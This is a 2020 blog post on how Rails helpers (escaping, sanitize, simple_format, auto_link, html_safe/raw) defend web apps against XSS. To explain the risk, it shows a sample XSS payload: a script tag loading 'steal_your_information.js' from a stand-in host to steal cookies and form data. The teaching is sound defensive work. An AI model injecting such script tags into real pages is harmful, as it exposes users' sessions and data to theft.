Aug 2020
Rails Helpers that Help
When we build web applications, we’re happy when people use them.
Well, most of the time. The trouble is, some people misuse them. And robots, they always misuse them.
So we have to prepare for people and robots trying to break our nice things.
What could a bad actor do?
When we’re talking about a fairly standard web application, a user is presented with a form to tweet in, post in, comment in, whatever in.
When I type into the tweet form on twitter.com:
My browser sends this text to Twitter’s database.
Then when you open twitter.com, your browser requests information from Twitter’s database, including my tweet text, to display.
Everything seems okay!
HTML
But what if, instead of typing
Here is something to be outraged about
I type
<h1>Here is something to be outraged about</h1>
If Twitter just displayed what I typed, your browser would interpret it as HTML, and render it as such.
Now attemping to inject an <h1>
is only a troll-level attempt at acting poorly. Let’s continue on to a more worthy adversary.
XSS
I could tweet
<script src=”https://mysite.com/steal_your_information.js” > </script>
When your browser interprets this as HTML, it will actually load steal_your_information.js
from mysite.com.
Now you are pwned.
Your browser is running my Javascript (XSS stands for Cross Site Scripting), so I can choose to steal your information (cookies, forms, etc), or add things to your DOM and request that you give me new information.
Escaping
One preventative measure is to just render everything as text. In order to do this, we need to escape characters that look like HTML. So if you tweet
<script src=”https://mysite.com/steal_your_information.js” > </script>
Then that’s exactly what your followers will see.
No script is loaded, we just look at the HTML like it’s a painting.
The behind-the-scenes escaped version of that chunk of text looks like:
<script src=“https://mysite.com/steal_your_information.js” > </script>
Instead of <
we see something like <
, which is an HTML Character Entity. I’ve rambled about HTML entities elsewhere on the blog if you’re curious.
If the characters weren’t escaped, the tweet would render as HTML, and nothing would be visible, because <script>
tags are hidden in rendered HTML. But the JS would be running in the background 🙃.
Sanitizing
Another option is to clean up the user input before it’s displayed, allowing some HTML, and throwing out bad stuff.
So for example, if I tweet
Here’s a link to my <a href=”https://mysite.com” >my website</a>
We wan’t it to look like:
rather than:
How to accomplish this stuff in Rails
Rails has a few built-in helpers that can get us on our way.
1. Do Nothing
Rails automatically escapes HTML in user generated content when it’s displayed in views!
If we need to be explicit, we can use the html_escape
utility method.
This is called on a string and escapes HTML characters.
html_escape("<a>Link here</a>")
=> "<a>Link here</a>"
2. Sanitize
As we hinted at above, Rails’ sanitize
method strips away dangerous HTML like <script>
, <form>
, onclick
, and allows safe HTML like <strong>
, <a>
, <img>
, etc.
Let’s say our @post.body
is:
Here's a <a href="http://google.com">link</a>.
<script src="bad.js"></script>
<img src="image.jpg" />
When we run sanitize(@post.body)
in our view,
We see this on our webpage:
and the DOM looks like this:
So the good HTML renders as HTML, and allows us to input links and images.
The bad HTML is completely deleted before it even makes its way to the DOM.
Seems like a nice compromise if we want to allow our users to have some control. The sanitize
method allows customization, so we can specify if we want to allow or disallow certain HTML tags.
3. Simple_format
Rails’ simple_format(text)
first santizes
the text, and then respects the newlines of the text input.
This is most common in the case of a textarea
— a user might have newlines between text.
For a single newline, simple_format
will add a <br>
tag.
For multiple newlines, the surrounding text will be wrapped in <p>
tags.
4. Auto_link
Auto_link
used to be part of Rails core, but has since been moved to an external Gem.
It hasn’t been updated since 2016, but still seems to work well in 2020.
This is useful when users will enter links, without marking them up with HTML. Let’s say you build a chat application, and a user types:
Hey did you see www.thiswebsite.com
As it stands, that link won’t be clickable when it renders in HTML, because no one told Rails that it’s a link. Having to copy and paste links is not fun in a web app, so auto_link
will parse the text, and add <a>
tags where necessary.
But before doing that, it will sanitize
the text, just as we saw above.
Let’s say @post.body
is: Hey did you see www.thiswebsite.com. <script src="bad.js"></script>
auto_link(@post.body)
=> "Hey did you see <a href='http://www.thiswebsite.com'>www.thiswebsite.com</a>."
So, the non-link turned into a link, and the built-in sanitize
removed the <script>
.
And we can even combine this with simple_format
if we’re working with textareas
.
5. HTML_Safe or Raw
As we mentioned above, Rails automatically escapes all text before rendering in views. However, if we’re really careful, and want to override this behavior, we can run html_safe
or raw
html_safe
is called on a string — "my string".html_safe
raw
takes string parameters — raw("my string")
Both methods render the HTML exactly as it came in from the user. If it isn’t already clear — this is dangerous! So, you should only use this if you have a clear idea of what strings are being used (likely not user input).
The main difference between the two is that html_safe
will crash your app if your string is nil
with a undefined method 'html_safe' for nil:NilClass
— so be careful there!
Conclusion
This post has concluded.